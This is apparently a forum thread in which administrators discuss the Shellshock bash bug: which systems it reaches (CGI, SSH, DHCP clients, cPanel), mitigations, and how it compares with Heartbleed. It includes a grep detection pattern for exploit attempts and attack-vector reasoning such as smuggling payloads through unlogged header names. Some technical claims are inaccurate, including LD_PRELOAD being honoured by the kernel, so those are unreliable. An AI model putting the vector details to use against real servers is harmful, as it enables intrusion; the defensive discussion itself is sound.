All the managers I know will stop reading after this, sit back and think "aaah, those silly techies. Worrying about nothing".
I gave exactly the opposite advice: We should assume every public and non-public facing system is vulnerable (many were). I'd rather cause a big stinky scare and be proven wrong than downplaying the issue and being proven wrong.. the hard way.
You probably had a good reason for saying this to your organisation, but it's not something that other people should blindly re-use for their own purposes.
Yes, I did have a good reason: Our initial tests indicate that the organization is not vulnerable.
To be fair to you and to me, I can understand your take on what I posted but what I posted was redacted to remove organization-identifying information. A better redaction would perhaps have been Our initial scans and appraisals are that our public-facing systems are likely not subject to shellshock.
For any companies that handle customer data, especially PII or credit card information, even having the data access could be actionable and result in massive costs/fines.
If an attacker can fully control the name of an injected environment variable, then you've lost already. The attacker can override LD_PRELOAD, which is an environment variable honored by the Linux kernel itself.
Jesus. That's been out of support for well over 2 years. I can't imagine this is the only problem it has. I'm curious: what's keeping the organization from upgrading it?
This one doesn't even have the excuse of running a piece of lab equipment (I saw such a system recently running Win95 without OSR1, so it doesn't even have USB support. They move data around with ZIP disks!).
I've got to maintain a couple of RHEL4 servers that have simulation software running on them that has never been ported forward (education - the people who wrote it have long since left). Though we also still have a couple of DEC Alpha's kicking about attached to nanofabrication services. Fun times... Luckily I don't need to maintain all the win98 boxes we still have as well. Or the DOS ones.
You can tail your access.log and grep the expression "\(?\s_\s\)?\s{|cgi" to get an idea if someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable cgi, you might as well track it being requested.
That will only find either clumsy exploit attempts or whitehat scans that are not trying to hide themselves.
CGI sends most headers through to the script as environment variables (i.e. a Foobar: header will turn into $HTTP_FOOBAR) so at attacker can just pick a header name that isn't likely to be logged.
Had anyone suggested and/or implemented something like building a tiny wrapper for bash that would clean environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?
I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??
Are you running an HTTP or SSH server that faces the public? If so you need to update or take mitigation steps ASAP. If not you can wait until apple patches.
I'm reluctant to add to uncertainty, but I'm not sure these are the only concerns. Many Linux systems execute shell scripts via bash after acquiring a DCHP address, and would be vulnerable if someone took over the DHCP servers in, say, a co-working space, cafe or airport and maliciously configured them. I'm not 100% sure if Mac OS X (or iOS) use shell scripts for post-assignment configuration. The short answer is to be careful about wireless access you don't control until Apple issues a patch.
Wait, what? I know DHCP clients have had exploits but those were of the more mundane buffer overflows/range checking type; there are DHCP clients implemented in bash? Something doesn't seem right about that - AFAIK DHCP data like IPs and so forth are binary, not text.
I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.
>I can't think of many embedded devices that don't use Busybox instead.
What about all these shitty wireless routers out there? I think in the past they were QNX-based but they've long moved to being linux based. We know popular projects like dd-wrt and pfsense are probably okay (ash instead of bash), but what about the thousands of others? My own router is supplied by AT&T for its u-verse service. God knows what its running. Or all the NAS devices out there and load balancers, etc.
I guess we'll find out when the whitehats are done scanning the entire internet for vulnerable hosts.
I have a higher-end (albeit still consumer-level) ASUS wireless router that uses Busybox. I can't imagine that cheaper, lower-end models would be using full GNU bash instead.
The vulnerability only exists during the startup of a bash process. Updating bash is enough. Bash processes that are already running are past the point where they could be exploited. Future calls to bash will get the updated version. No services need to be restarted to apply the fix.
Note that you'll typically want to supply the URL to a CGI script on the site, not just www.example.com. Don't think you're unaffected just because the top-level page of your site doesn't appear vulnerable.
Either of these will typically show you your running terminal:
ps -p $$
echo $0
(command name that was used to invoke the shell)
Not reliable:
echo $SHELL
(preferred shell for the user, not necessarily what is running)
Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.
On the one hand, if this had been in Windows, no one in the public would have been able to stumble across it, though you would expect them to be paying rooms full of engineers to make sure that's never necessary (and yet stuff happens.)
On the other hand, despite the premise of open source that 'many eyes make all bugs shallow', the amount of code in the wild and the complexity of it (and the diversity of implementation languages) has pretty much guaranteed that there's more code than possible coverage.
No one has to come up with clever marketing for Microsoft exploits because everyone expects there to be tons of them, given the level of complexity, and that Microsoft will push patches for them, because it affects their bottom line. Meanwhile, it seems in the open source world, you need PR campaigns to goad the community into due diligence.
>But people can casually look at code and see vulnerabilities, any time they want.
They could, but they don't. Same way I can look at the sky and see an asteroid. Possible? Sure. Likely? Not without some pretty advanced tools or a hell of a lot of luck.
>But people can casually look at code and see vulnerabilities, any time they want.
I think you're dismissing the level of experience, smarts, and inter-disciplinary knowledge it takes to find a bug like this. More than likely, even those with all those skills and at the 1% of them can't just eyeball code and go, "Ah yes, here." They're instead writing a lot of little tools and seeing what they can break. Then they go back, see what broke, and work out if its possible to exploit that exception or crash condition.
These types of tools and methods work just as well with closed source. Attacking closed source seems very unfair to me in these scenarios.
> ...if this had been in Windows, no one in the public would have been able to stumble across it...
Kind of a broad statement there, isn't it?
By your logic - Where do zero day Windows vulnerabilities come from then? People outside of Microsoft have certainly reported security issues to Microsoft in the past.
Can you name those hundreds of issues discovered on Windows stack for, say, 2014? I'm on IIS and I really want to know if I'm missing something.
MS had it's fair share of security flaws in the past but give them credit for their current state. You sound like people still talking about BSODs, while it's certainly a thing in the past.
There are a lot of comments below stating mod_php is just as vulnerable as mod_cgi. This is NOT the case, mod_php is unaffected by shellshock.
Edit: Just to be clear, even using system / exec etc is not affected as the environment variables are not passed along to the sub process by the apache sapi.
I seem to remember somewhere on Show HN a service that lets one execute a command to populate an online pastebin. Something like: `cat | nc service.com 9199`. Now however I cannot find this service. Anyone know where?
ISC DHCP Client has a check_option_values function (at the end of dhclient.c), which (if it is properly used, I don't understand the surrounding code enough) should prevent this from being exploited.
Can the bug be avoided just by setting the default shell for your webserver's user (generally www-data in debian) to /bin/dash? At least from the perspective of Apache users?
The CGI and SSH attack vectors are getting a lot of attention because they are so trivially exploitable. But as someone (I believe tptacek) put it in another thread, this bug has one of the biggest potential attack surfaces in history. Anything that sets any environment variable to an untrusted value and then invokes bash is vulnerable. For example, on some systems, simply connecting to an attacker-controlled network is enough to cause code execution through the DHCP client.
If you choose not to upgrade bash, you are trusting that none of the code on your system uses bash in this way. It's extremely unlikely that the vectors that have been publicized so far are the only major ones.
Alright so necessary conditions are "sets env variables" + "invoke bash". That clarifies, thanks.
I'm not advocating not updating, I'm just trying to understand what to do with this info for say, my hosted project that _doesn't set env vars nor invoke bash_.
There's no way that this bug could affect even a fraction of the number of users Heartbleed did. The number of affected machines is probably 1/10000th that of heartbleed, and heartbleed exposed hundreds of millions of users, the SSL keys of servers, etc to attack. The fact that legacy CGI scripts are the only attack vector being discussed right now is proof enough of how outdated this bug is.
Keep in mind that hackers constantly take advantage of old exploitable legacy software in servers around the world to get a shell, and nobody freaks out about it.
Plenty of stuff uses environment variables and in places one may not think it vulnerable. Reviewing some of our own software, it's unclear, just from documentation, which third-party systems actually pass some environment when shelling or not.
"Legacy CGI" might be discussed as a clear-and-easy example but this will impact many, many other systems.
Even if this bug affects every single *NIX server in the world, it still hasn't exposed, for example, CloudFlare's private keys, or your Gmail/Yahoo mail, or the clients (and keys) connected to VPNs around the globe. Heartbleed exposed so much private information, immediately, that it was the biggest private data leak in history, and will remain so for decades.
This bash bug lets you run code, but on a much smaller number of servers, without an immediate impact on the world's most important services, and won't give up things like ssl keys without a local privilege escalation. It's much, much more limited in the scope of the immediate threat. It's still an immediate threat. I'm just saying it is nothing compared to Heartbleed.
cPanel is probably the most popular reseller hosting software for shared web hosting and it relies on CGI in all kinds of places. That alone provides a huge amount of exploitable hosts - I tried to Shodan it (port 2082) but it seems down right now.
Since cPanel is designed for people without system administration experience, it's unlikely they will be patched in a timely manner too. All the CGI scripts are in known static locations, so I wouldn't be surprised to see a worm that targets cPanel servers very soon.
This is definitely not going to affect just a few legacy CGI sites.
cPanel's official notice is that they checked and their code is not vulnerable (at least, whatever their current code is).
Of course it's possible that other CGI apps will execute a shell at some point, and that there's bound to be plenty of servers that are exploitable. But the number of SSL-bearing sites, and the sheer number of users (I mean, hundreds of millions, at least) that were exposed due to such gigantic sites having a huge hole for so long, meant that virtually everyone's personal information was vulnerable, immediately, to say nothing of stealing SSL keys.
This is definitely a serious bug. Any remote code execution is a top priority. But i've never seen a bug like Heartbleed before, and it's unlikely we ever will again, as (hopefully?) it will change the way forward services are deployed to implement proper memory protection between transport and application layers. Compared to exposing the personal information (and secured keys) of so many users and domains, just executing code on miscellaneous servers seems cute in comparison.
But it seems you only need one login to compromise the whole server. If I buy $3 hosting on a shared server then I can pwn the whole server can't I (using cPanel to escalate an attack above my privelege level)? What are the chances that one user account on a shared server is crackable, pretty high I'd imagine.
However... This just shows that the bash installation has this problem. If your webserver that is running is not interacting with bash, then there is no problem at all.
So look at your webserver. Its not per-se a problem in bash. Its more a problem of webservers using bash directly.
There are many network daemons besides httpd which, if they delegate request handling to any other process or system functionality, may:
1. Invoke bash somewhere in the call stack
2. Pass request data via environment variables
If both of these are true, then the daemon is presumed vulnerable. You may still be vulnerable if (2) is false (by design) yet the attacker is able to set environment variables.
CGI / Apache / httpd is the obvious vector, but don't be lured into complacency.